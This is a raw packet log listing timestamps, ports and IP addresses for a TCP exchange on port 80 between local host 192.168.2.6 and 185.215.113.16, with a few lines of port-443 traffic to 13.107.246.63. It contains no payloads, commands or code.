Dec 7, 2024 10:52:01.836114883 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.836143017 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.836189032 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.838123083 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.838232040 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.838262081 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.838309050 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.840246916 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.840310097 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.840339899 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.840574980 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.842359066 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.842473030 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.842500925 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.842576027 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.844463110 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.844583035 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.844599009 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.844763994 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.846631050 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.846645117 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.846852064 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.848720074 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.848817110 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.848845959 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.849018097 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.851001978 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.851166010 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.851180077 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.851310968 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.852829933 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.852947950 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.852974892 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.853323936 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.854999065 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.855108023 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.855120897 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.855196953 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.857842922 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.858015060 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.858041048 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.858172894 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.859198093 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.859251022 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.859323978 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.859407902 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.861253977 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.861327887 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.861332893 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.861501932 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.863405943 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.863550901 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.863557100 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.863723040 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.865461111 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.865617990 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.865658045 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.865777016 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.867583990 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.867724895 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.867734909 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.867789030 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.869745016 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.869877100 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.869890928 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.870013952 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.871764898 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.871885061 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.872137070 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.873908043 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.874027967 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.874207973 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.875962973 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.876086950 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.876097918 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.876250982 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.878067017 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.878148079 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.878181934 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.878268003 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.880179882 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.880261898 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.880264044 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.880322933 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.961800098 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.961890936 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.961900949 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.962001085 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.962615967 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.962676048 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.962789059 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.962867975 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.964459896 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.964514971 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.964551926 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.964652061 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.966275930 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.966319084 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.966332912 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.966370106 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.968024015 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.968070984 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.968111038 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.968168974 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.969844103 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.969894886 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.969970942 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.970017910 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.971571922 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.971620083 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.971661091 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.971751928 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.973359108 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.973407984 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.973443985 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.973484039 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.975006104 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.975085020 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.975121021 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.975168943 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.977096081 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.977165937 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.977169991 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.977202892 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.978526115 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.978576899 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.978610992 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.978657007 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.980766058 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.980823040 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.980942965 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.980993032 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.982400894 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.982449055 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.982456923 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.982511044 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.983814001 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.983861923 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.983886003 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.983937025 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.985102892 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.985150099 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.985263109 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.985409021 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.986581087 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.986638069 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.986720085 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.986783981 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.988064051 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.988122940 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.988195896 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.988243103 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.989542007 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.989589930 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.989629984 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.989670992 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.991060972 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.991127014 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.991169930 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.991225004 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.992616892 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.992665052 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.992698908 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.992748976 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.994065046 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.994132042 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.994163990 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.994208097 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.995580912 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.995636940 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.995670080 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.995712996 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.997062922 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.997144938 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.997178078 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.997214079 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.998568058 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.998621941 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:01.998748064 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:01.998913050 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.000000000 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.000041008 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.000170946 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.000231028 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.001473904 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.001521111 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.001589060 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.001640081 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.002903938 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.002952099 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.003027916 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.003098965 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.004467010 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.004517078 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.004535913 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.004575968 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.005821943 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.005867004 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.005937099 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.005986929 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.007277966 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.007349968 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.007395029 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.008730888 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.008799076 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.008888006 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.008933067 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.010078907 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.010127068 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.010217905 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.010251999 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.011526108 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.011574030 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.011647940 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.011691093 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.012937069 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.013056040 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.013056993 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.013092995 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.014405966 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.014452934 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.014550924 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.014609098 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.015862942 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.015875101 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.015907049 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.015919924 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.017239094 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.017285109 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.017303944 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.017340899 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.018697023 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.018740892 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.018805027 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.018848896 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.020116091 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.020168066 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.020245075 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.020287991 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.021536112 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.021583080 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.021648884 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.021692038 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.023000956 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.023061037 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.023081064 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.023098946 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.024502993 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.024513960 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.024560928 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.025892019 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.025947094 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.026015997 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.026093960 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.027556896 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.027604103 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.027623892 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.027663946 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.028713942 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.028765917 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.028836012 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.028922081 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.030133963 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.030180931 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.030199051 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.030220985 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.031625986 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.031667948 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.031677008 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.031708002 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.033047915 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.033097029 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.033243895 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.033284903 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.034421921 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.034468889 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.034509897 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.034554958 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.035876036 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.035907984 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.035926104 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.035940886 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.037417889 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.037440062 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.037487984 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.038703918 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.038824081 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.038830042 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.038866997 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.040158987 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.040216923 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.040390968 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.041548014 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.041603088 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.153639078 CET	443	49853	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.154122114 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.154189110 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.154230118 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.154272079 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.154758930 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.154777050 CET	49853	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:02.154797077 CET	443	49853	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.154824018 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.154855967 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.155019999 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.155302048 CET	49853	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:52:02.155308962 CET	443	49853	13.107.246.63	192.168.2.6
Dec 7, 2024 10:52:02.155852079 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.155865908 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.155900955 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.156888962 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.156940937 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.157001972 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.157042980 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.157998085 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.158104897 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.158155918 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.159090996 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.159149885 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.159189939 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.159296989 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.160175085 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.160243034 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.160283089 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.160325050 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.161267042 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.161323071 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.161418915 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.161515951 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.162456989 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.162468910 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.162514925 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.163376093 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.163408041 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.163460016 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.164477110 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.164537907 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.164561987 CET	80	49852	185.215.113.16	192.168.2.6
Dec 7, 2024 10:52:02.164608955 CET	49852	80	192.168.2.6	185.215.113.16
Dec 7, 2024 10:52:02.165512085 CET	80	49852	185.215.113.16	192.168.2.6
